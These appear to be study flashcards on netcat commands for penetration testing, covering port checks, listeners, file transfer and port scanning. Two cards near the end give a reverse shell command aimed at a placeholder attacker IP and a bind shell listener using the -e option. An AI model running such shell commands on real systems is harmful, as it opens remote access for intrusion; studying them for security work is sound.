netcat commands Flashcards
netcat
- network utility commonly used in penetration testing
- for tasks such as remote access
- banner grabbing
- port scanning
- small footprint makes it easily portable
- can create reverse shells and bind shells, allowing for remote command execution
nc 10.0.0.10 80
test if the remote TCP port is open (-u for UDP), in this case, port 80
nc -l 1234
set up a TCP server listening on port 1234 (-u for UDP)
The -l option in Netcat puts it into listening mode, allowing it to act as a server. In this mode, Netcat waits for incoming connections on a specified port, enabling tasks like setting up a listener for reverse shells or transferring data.
nc -k -l 1234
keep netcat listener alive after the current connection dies
The -k option in Netcat forces the listener to stay active and keep listening for new incoming connections even after a connection is closed. It is commonly used to allow multiple connections to the same port during a session.
nc 10.0.0.10 1234 < my.tgz
transfer file to remote endpoint via netcat
nc -l 1234 > my.tgz
receive and save file via netcat
nc -z 10.0.0.10 1-1000
scan a range of port for a target (e.g. 1 to 1000)
The -z option in Netcat is used for zero-I/O mode, primarily for port scanning. It tells Netcat not to send or receive any data, focusing instead on checking whether specified ports are open on a target system
nc -z 10.0.0.10 1-100 200-300
scan multiple ranges of ports
The -z option in Netcat is used for zero-I/O mode, primarily for port scanning. It tells Netcat not to send or receive any data, focusing instead on checking whether specified ports are open on a target system
nc -vuz -w1 10.0.0.10 1-1000
scan a range of udp ports with 1-sec timeout
- -v: The -v option in Netcat enables verbose mode, which provides detailed output about the actions being performed. This can include information like connection status, data being sent or received, and error messages, making it useful for troubleshooting and understanding the execution flow during network tasks
- -z: zero-I/O mode, primarily for port scanning. It tells Netcat not to send or receive any data, focusing instead on checking whether specified ports are open on a target system
- -u: send via UDP
nc <attacker-ip> 4444 -e /bin/bash
create a reverse shell on target host
The -e option in Netcat allows it to execute a specified program after a successful connection is established. This is commonly used for creating a backdoor or reverse shell by linking the remote connection to a shell program like /bin/sh on Linux or cmd.exe on Windows.
Note: This option is often considered risky and can be disabled in some versions of Netcat due to its potential for misuse in malicious activities
nc -l 4444 -e /bin/bash
create a persistent netcat listener for bind shell
- -l: The -l option in Netcat puts it into listening mode, allowing it to act as a server. In this mode, Netcat waits for incoming connections on a specified port, enabling tasks like setting up a listener for reverse shells or transferring data
- -e: The -e option in Netcat allows it to execute a specified program after a successful connection is established. This is commonly used for creating a backdoor or reverse shell by linking the remote connection to a shell program like /bin/sh on Linux or cmd.exe on Windows. Note: This option is often considered risky and can be disabled in some versions of Netcat due to its potential for misuse in malicious activities
nc -l 12345 -c ‘uptime’
run a command and redirect output to client
- -l: The -l option in Netcat puts it into listening mode, allowing it to act as a server. In this mode, Netcat waits for incoming connections on a specified port, enabling tasks like setting up a listener for reverse shells or transferring data
- -c: The -c option in Netcat allows you to execute a shell command and redirect its input/output over the network connection. This can be useful for creating simple command execution functionality during penetration testing. However, like the -e option, this feature is not universally available and may be omitted in some versions of Netcat for security reasons.
